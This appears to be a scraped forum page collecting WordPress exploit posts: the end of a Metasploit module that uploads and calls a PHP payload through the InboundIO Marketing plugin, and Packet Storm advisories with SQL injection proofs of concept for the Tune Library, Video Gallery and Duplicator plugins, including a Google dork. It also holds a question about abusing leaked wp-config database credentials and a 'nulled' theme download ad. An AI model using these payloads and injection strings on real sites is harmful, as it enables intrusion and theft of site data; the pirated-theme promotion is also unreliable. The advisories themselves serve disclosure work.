register_files_for_cleanup(php_page_name) else fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'Server did not answer') end print_status("#{peer} - Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_page_name) }, 5 ) end end Source: http://packetstorm.wowhacker.com/1504-exploits/wp_inboundio_marketing_file_upload.rb.txt
  21. ======================================================================= title: SQL Injection product: WordPress Tune Library Plugin vulnerable version: 1.5.4 (and probably below) fixed version: 1.5.5 CVE number: CVE-2015-3314 impact: CVSS Base Score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) homepage: https://wordpress.org/plugins/tune-library/ found: 2015-01-09 by: Hannes Trunde mail: hannes.trunde@gmail.com twitter: @hannestrunde ======================================================================= Plugin description: ------------------- "This plugin is used to import an XML iTunes Music Library file into your WordPress database. Once imported, you can display a complete listing of your music collection on a page of your WordPress site." Source: [url]https://wordpress.org/plugins/tune-library/[/url] Recommendation: --------------- The author has provided a fixed plugin version which should be installed immediately. Vulnerability overview/description: ----------------------------------- Because of insufficient input validation, a sql injection attack can be performed when sorting artists by letter. However, special conditions must be met in order to exploit this vulnerability: 1) The wordpress security feature wp_magic_quotes(), which is enabled by default, has to be disabled. 2) The plugin specific option "Filter artists by letter and show alphabetical navigation" has to be enabled. Proof of concept: ----------------- The following HTTP request to the Tune Library page returns version, current user and db name: =============================================================================== [url]http://www.site.com/?page_id=2&artistletter=G[/url]' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20 =============================================================================== Contact timeline: ------------------------ 2015-04-08: Contacting author via mail. 2015-04-09: Author replies and announces a fix within a week. 2015-04-12: Mail from author, stating that plugin has been updated. 2015-04-14: Requesting CVE via post to the open source software security mailing list: [url]http://openwall.com/lists/oss-security/2015/04/14/5[/url] 2015-04-20: Release of security advisory. Solution: --------- Update to the most recent plugin version. Workaround: ----------- Make sure that wp_magic_quotes() is enabled and/or disable "Filter artists by letter..." option. Source: http://packetstorm.wowhacker.com/1504-exploits/wptunelibrary154-sql.txt
  22. ###################### # Exploit Title : Wordpress Video Gallery 2.8 SQL Injection Vulnerabilitiey # Exploit Author : Claudio Viviani # Vendor Homepage : WordPress Video Gallery - Best YouTube and Vimeo Video Gallery Plugin # Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip # Dork Google: inurl:/wp-admin/admin-ajax.php?action=googleadsense # Date : 2015-04-04 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Description Wordpress Video Gallery 2.8 suffers from SQL injection Location file: /contus-video-gallery/hdflvvideoshare.php add_action('wp_ajax_googleadsense' ,'google_adsense'); add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense'); function google_adsense(){ global $wpdb; $vid = $_GET['vid']; $google_adsense_id = $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid); $query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id); $google_adsense = unserialize($query); echo $google_adsense['googleadsense_code']; die(); $vid = $_GET['vid']; is not sanitized ###################### # PoC http://target/wp-admin/admin-ajax.php?action=googleadsense&vid=[sqli] ###################### # Vulnerability Disclosure Timeline: 2015-04-04: Discovered vulnerability 2015-04-06: Vendor Notification 2015-04-06: Vendor Response/Feedback 2015-04-07: Vendor Send Fix/Patch (same version number) 2015-04-13: Public Disclosure ####################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog F.F.H.D - Free Fuzzy Hashes Database (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpvideogallery28-sql.txt
  23. ###################### # Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF # Exploit Author : Claudio Viviani # Vendor Homepage : WordPress Duplicator - Copy, Move, Clone or Backup your WordPress # Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip # Date : 2015-04-08 # Tested on : Linux / Mozilla Firefox ###################### # Description Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability Location file: /view/actions.php This is the bugged ajax functions wp_ajax_duplicator_package_delete: function duplicator_package_delete() { DUP_Util::CheckPermissions('export'); try { global $wpdb; $json = array(); $post = stripslashes_deep($_POST); $tblName = $wpdb->prefix . 'duplicator_packages'; $postIDs = isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null; $list = explode(",", $postIDs); $delCount = 0; if ($postIDs != null) { foreach ($list as $id) { $getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A); if ($getResult) { $row = $getResult[0]; $nameHash = "{$row['name']}_{$row['hash']}"; $delResult = $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}"); if ($delResult != 0) { $post['duplicator_delid'] variable is not sanitized A authorized user with "export" permission or a remote unauthenticated attacker could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site by enticing an authenticated admin (CSRF) ###################### # PoC http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete POST: duplicator_delid=1 and (select * from (select(sleep(20)))a) ###################### # Vulnerability Disclosure Timeline: 2015-04-08: Discovered vulnerability 2015-04-08: Vendor Notification 2015-04-09: Vendor Response/Feedback 2015-04-10: Vendor Send Fix/Patch 2015-04-10: Public Disclosure ####################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog F.F.H.D - Free Fuzzy Hashes Database (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpduplicator-sqlxsrf.txt
  24. date mysql - damage

    Sunt curios ce fel de damage se poate face daca cunosti urmatoarele date de la un mysql la un site de wordpress?. Spre exemplu: /** The name of the database for WordPress */ define('DB_NAME', 'xxxx'); /** MySQL database username */ define('DB_USER', 'xxxx'); /** MySQL database password */ define('DB_PASSWORD', 'xxxxxx'); /** MySQL hostname */ define('DB_HOST', 'xxxxx'); define('AUTH_KEY', define('SECURE_AUTH_KEY', define('LOGGED_IN_KEY', define('NONCE_KEY', define('AUTH_SALT', define('SECURE_AUTH_SALT', define('LOGGED_IN_SALT', define('NONCE_SALT',
  25. Xiara WordPress Nulled

    Download nulled Xiara WordPress Theme v1.7. Responsive Onepage Parallax Theme is a smooth, simple to use, agreeable and clean. Everything in Xiara WordPress Theme was made to give the best user-experience possible. We carefully focus in the design, colors, layout, usability, and typography. Download
×